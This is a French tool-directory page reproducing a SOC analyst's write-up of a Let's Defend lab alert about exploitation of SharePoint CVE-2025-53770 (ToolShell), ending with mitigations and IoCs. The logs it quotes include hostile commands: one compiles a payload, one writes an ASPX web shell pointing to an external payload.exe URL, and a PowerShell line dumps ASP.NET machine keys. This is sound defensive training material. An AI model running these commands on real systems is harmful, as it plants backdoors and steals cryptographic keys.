Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
-SOC342---CVE-2025-53770-SharePoint-ToolShell-Auth-Bypass-and-RCE — Une activité pour entraîner les compétences d'analyse et de reporting | Kitploit
Outils/GitHubGitHub/bossnick98/-soc342---cve-2025-53770-sharepoint-toolshell-auth-bypass-and-rce
Analyse des VulnérabilitésExploitationExploitation d'Applications WebAnalyse ForensiqueRenseignement sur les MenacesApprentissage et ÉducationRéponse aux IncidentsLabs et Pratique
GitHub
bossnick98/-soc342---cve-2025-53770-sharepoint-toolshell-auth-bypass-and-rce

-SOC342---CVE-2025-53770-SharePoint-ToolShell-Auth-Bypass-and-RCE

Une activité pour entraîner les compétences d'analyse et de reporting

Voir le dépôt
4il y a 1 anPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

SOC342---CVE-2025-53770-SharePoint-ToolShell-Contournement-d-authentification-et-RCE

Ceci est une investigation menée sur la plateforme Let's Defend, basée sur une récente CVE SharePoint. Jetons un coup d'œil.

Immagine 2025-07-27 162109
  1. Examinez le nom de la règle. Les noms de règles sont généralement créés spécifiquement pour l'attaque à détecter. En examinant le nom de la règle, vous pouvez comprendre à quelle attaque vous faites face.

La règle SOC342 a détecté une requête POST non authentifiée ciblant la page vulnérable ToolPane.aspx, comprenant :

  • une grande charge utile (Content-Length: 7699)
  • un referer suspect (SignOut.aspx) probablement utilisé pour masquer l'origine
  • un comportement cohérent avec l'exploitation de la vulnérabilité ToolShell
  1. Détectez entre quels deux appareils le trafic a lieu.

Un utilisateur externe (IP: 107.191.58.76) a envoyé une requête forgée à un serveur SharePoint interne (172.16.20.17).

Analysez le journal de notre endpoint

2

Un processus w3wp.exe exécutant une commande PowerShell encodée peut indiquer une exploitation potentielle ou une activité de post-exploitation (par exemple, exécution d'une charge utile cachée).

Dans un environnement SharePoint, il est important de vérifier si ce comportement est attendu ou s'il représente un abus.

La commande a été obscurcie à l'aide de base64

Immagine 2025-07-27 163800

Cette charge utile permet à l'attaquant d'extraire et d'afficher les clés de configuration ASP.NET critiques de la machine sur laquelle elle s'exécute.

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /out:C:\Windows\Temp\payload.exe C:\Windows\Temp\payload.cs

"C:\Windows\System32\cmd.exe" /c echo <form runat="server"> <object classid="clsid:ADB880A6-D8FF-11CF-9377-00AA003B7A11"><param name="Command" value="Redirect"> <param name="Button" value="Test"> <param name="Url" value="http://107.191.58.76/payload.exe\"> > C:\Program Files\Common Files\Microsoft Shared\Web Server Extensions\16\TEMPLATE\LAYOUTS\spinstall0.aspx

Compile un exécutable à partir du code source C# sur le serveur.

Crée une porte dérobée web (fichier ASPX malveillant) dans le chemin SharePoint, qui, lorsqu'il est visité, permet l'exécution ou le téléchargement d'une charge utile externe.

cmd.exe /c echo > C:\Program Files\Common Files\Microsoft Shared\Web Server Extensions\16\TEMPLATE\LAYOUTS\spinstall0.aspx

Cette commande crée un fichier nommé spinstall0.aspx dans le dossier LAYOUTS de SharePoint et y écrit le contenu (ici est un espace réservé représentant le code d'un webshell)

Voici le hash de spinstall0.apx 92bb4ddb98eeaf11fc15bb32e71d0a63256a0ed826a03ba293ce3a8bf057a514

Jetons un coup d'œil sur virustotal.

Immagine 2025-07-27 164912

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "[System.Web.Configuration.MachineKeySection]::GetApplicationConfig()"

Cette commande permet à l'attaquant d'accéder à la configuration d'application de MachineKeySection, ce qui peut exposer des clés cryptographiques sensibles comme la clé de validation et la clé de déchiffrement.

Ces clés sont critiques pour la sécurité ASP.NET, protégeant des éléments comme les cookies d'authentification et ViewState.

L'exposition ou la récupération de ces clés peut permettre aux attaquants de forger des jetons d'authentification, de déchiffrer des données protégées ou d'effectuer d'autres attaques contre l'application web.

MITRE ATT&CK

mitre

Note de l'analyste :

L'alerte a été générée en raison d'une activité PowerShell inhabituelle observée sur un serveur SharePoint, déterminée par la suite comme une tentative d'exploitation ciblant CVE-2025-53770. L'attaquant a d'abord déposé et compilé un exécutable C# personnalisé (payload.exe) à l'aide du compilateur C# (csc.exe), puis a créé un webshell ASPX malveillant (spinstall0.aspx) dans un répertoire SharePoint accessible via le web. Ensuite, une commande PowerShell a été exécutée pour récupérer des clés cryptographiques sensibles de la machine depuis la configuration du serveur via la réflexion .NET. Cette séquence d'actions suggère une attaque en plusieurs phases conçue pour maintenir un contrôle persistant et éventuellement forger des jetons d'authentification. Le webshell a été vérifié comme malveillant avec un ratio de détection VirusTotal de 39/62. L'incident est confirmé comme un vrai positif, et des mesures supplémentaires de confinement et de remédiation sont recommandées.

Immagine 2025-07-27 170751

CVE-2025-53770 Detail

La désérialisation de données non fiables dans Microsoft SharePoint Server sur site permet à un attaquant non autorisé d'exécuter du code sur un réseau. Microsoft est conscient qu'un exploit pour CVE-2025-53770 existe dans la nature. Microsoft prépare et teste actuellement une mise à jour complète pour corriger cette vulnérabilité. En attendant, veuillez vous assurer que l'atténuation fournie dans cette documentation CVE est en place afin d'être protégé contre l'exploitation.

Immagine 2025-07-27 171020

Atténuation suggérée par Microsoft : Pour atténuer les attaques potentielles, les clients doivent :

  1. Utilisez des versions prises en charge de SharePoint Server sur site
  2. Appliquez les dernières mises à jour de sécurité liées ci-dessus.
  3. Déployez Microsoft Defender for Endpoint ou des solutions de menace équivalentes
  4. Assurez-vous que l'interface d'analyse anti-programme malveillant (AMSI) est activée et correctement configurée, avec une solution antivirus appropriée telle que Defender Antivirus
  5. Renouvelez les clés machine ASP.NET du serveur SharePoint

IoC

Spinstall0.aspx Web shell utilisé par les acteurs malveillants

Les acteurs ont également modifié le nom du fichier de diverses manières – comme spinstall.aspx, spinstall1.aspx, spinstall2.aspx

Ce rapport est basé sur une activité menée sur la plateforme Let's Defend. Toutes les découvertes et tous les documents présentés le sont à des fins éducatives uniquement. Tous les droits et la propriété appartiennent à Let's Defend.

Télécharger l’outil